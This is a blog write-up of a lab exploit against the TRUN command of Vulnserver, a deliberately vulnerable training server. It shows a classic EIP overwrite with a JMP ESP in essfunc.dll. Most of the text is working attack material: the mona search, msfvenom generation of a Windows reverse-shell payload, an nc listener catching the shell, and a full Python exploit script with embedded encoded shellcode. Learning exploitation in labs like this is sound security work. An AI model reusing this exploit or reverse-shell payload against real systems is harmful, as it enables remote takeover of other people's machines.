Vulnserver TRUN – This Time, We Go Vanilla (EIP)

This post will be a little shorter, but I wanted to finish up my vulnserver TRUN exploit paths.

Vulnserver TRUN – Introduction

If you haven’t read my previous write-up on the “TRUN” command, then I suggest you start with that one.

This exploit will pick up somewhere in the middle of the last one, with a different exploit path.

In this case, I will go with the standard vanilla EIP overwrite with a JMP ESP. For another example, you can visit the following write-up.

Finding the Jump

First, I started by taking a look at the modules again.

In this case, I decided to use the essfunc.dll, as I would not need to worry about null bytes.

Next, I used mona to search for a JMP ESP in the library.

!mona find -s "\xff\xe4" -m essfunc.dll    (ff e4 = JMP ESP)

Verifying the Jump

I selected one of the instructions randomly (0x625011af), and updated my payload.

buffer += "\x90" * 2001
# 0x625011af = JMP ESP
buffer += "\xaf\x11\x50\x62"
buffer += "\xcc" * (5000 - len(buffer))

As you can see, the breakpoint was hit as expected.

Additionally, the stack has my interrupts, so the exploit can now be finished!

Reverse Shell

With my skeleton in place, I generated some reverse shellcode to connect back to me.

[email protected]:~/vulnserver# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -b "\x00" -f py
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of py file: 1684 bytes

Once I added the new shellcode to my exploit, I resent the full payload.

[email protected]:~/vulnserver# python trun_eip_reverse.py
Welcome to Vulnerable Server! Enter HELP for help.

[+] Sending exploit...

As you can see, I was able to catch the reverse shell and complete the exploit!

[email protected]:~/vulnserver# nc -lvp 4444
listening on [any] 4444 ...
192.168.0.2: inverse host lookup failed: Unknown host
connect to [192.168.0.1] from (UNKNOWN) [192.168.0.2] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\IEUser\Downloads\vulnserver-master> whoami
whoami
ie8win7\ieuser

C:\Users\IEUser\Downloads\vulnserver-master>

Additionally, the server was not crashing at all, as seen in the following screenshot.

Final Code

Here is the final exploit that I used for my reverse shell.

#!/usr/bin/python

import socket
import os
import sys

host = "192.168.0.2"
port = 9999

buf =  ""
buf += "\xbe\x97\x7c\x63\x8e\xdb\xc8\xd9\x74\x24\xf4\x5f\x2b"
buf += "\xc9\xb1\x52\x31\x77\x12\x83\xef\xfc\x03\xe0\x72\x81"
buf += "\x7b\xf2\x63\xc7\x84\x0a\x74\xa8\x0d\xef\x45\xe8\x6a"
buf += "\x64\xf5\xd8\xf9\x28\xfa\x93\xac\xd8\x89\xd6\x78\xef"
buf += "\x3a\x5c\x5f\xde\xbb\xcd\xa3\x41\x38\x0c\xf0\xa1\x01"
buf += "\xdf\x05\xa0\x46\x02\xe7\xf0\x1f\x48\x5a\xe4\x14\x04"
buf += "\x67\x8f\x67\x88\xef\x6c\x3f\xab\xde\x23\x4b\xf2\xc0"
buf += "\xc2\x98\x8e\x48\xdc\xfd\xab\x03\x57\x35\x47\x92\xb1"
buf += "\x07\xa8\x39\xfc\xa7\x5b\x43\x39\x0f\x84\x36\x33\x73"
buf += "\x39\x41\x80\x09\xe5\xc4\x12\xa9\x6e\x7e\xfe\x4b\xa2"
buf += "\x19\x75\x47\x0f\x6d\xd1\x44\x8e\xa2\x6a\x70\x1b\x45"
buf += "\xbc\xf0\x5f\x62\x18\x58\x3b\x0b\x39\x04\xea\x34\x59"
buf += "\xe7\x53\x91\x12\x0a\x87\xa8\x79\x43\x64\x81\x81\x93"
buf += "\xe2\x92\xf2\xa1\xad\x08\x9c\x89\x26\x97\x5b\xed\x1c"
buf += "\x6f\xf3\x10\x9f\x90\xda\xd6\xcb\xc0\x74\xfe\x73\x8b"
buf += "\x84\xff\xa1\x1c\xd4\xaf\x19\xdd\x84\x0f\xca\xb5\xce"
buf += "\x9f\x35\xa5\xf1\x75\x5e\x4c\x08\x1e\xa1\x39\x12\xdf"
buf += "\x49\x38\x12\xce\xd5\xb5\xf4\x9a\xf5\x93\xaf\x32\x6f"
buf += "\xbe\x3b\xa2\x70\x14\x46\xe4\xfb\x9b\xb7\xab\x0b\xd1"
buf += "\xab\x5c\xfc\xac\x91\xcb\x03\x1b\xbd\x90\x96\xc0\x3d"
buf += "\xde\x8a\x5e\x6a\xb7\x7d\x97\xfe\x25\x27\x01\x1c\xb4"
buf += "\xb1\x6a\xa4\x63\x02\x74\x25\xe1\x3e\x52\x35\x3f\xbe"
buf += "\xde\x61\xef\xe9\x88\xdf\x49\x40\x7b\x89\x03\x3f\xd5"
buf += "\x5d\xd5\x73\xe6\x1b\xda\x59\x90\xc3\x6b\x34\xe5\xfc"
buf += "\x44\xd0\xe1\x85\xb8\x40\x0d\x5c\x79\x70\x44\xfc\x28"
buf += "\x19\x01\x95\x68\x44\xb2\x40\xae\x71\x31\x60\x4f\x86"
buf += "\x29\x01\x4a\xc2\xed\xfa\x26\x5b\x98\xfc\x95\x5c\x89"

buffer = "\x90" * 2001
# 0x625011af = JMP ESP
buffer += "\xaf\x11\x50\x62"
buffer += "\x90" * 16
buffer += buf
buffer += "\x90" * (5000 - len(buffer))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host,port))

print s.recv(1024)

print "[+] Sending exploit..."

s.send("TRUN  /.../" + buffer)

print s.recv(1024)

s.close()

Vulnserver TRUN – Conclusion

This finishes up the TRUN command, although this exploit was obviously easier than the last one.

I’m hoping to finish up the rest of the commands soon, but that might have to wait for some other posts.

You can find the final exploit in my GitHub repository, but let me know if you think there is anything that I should add.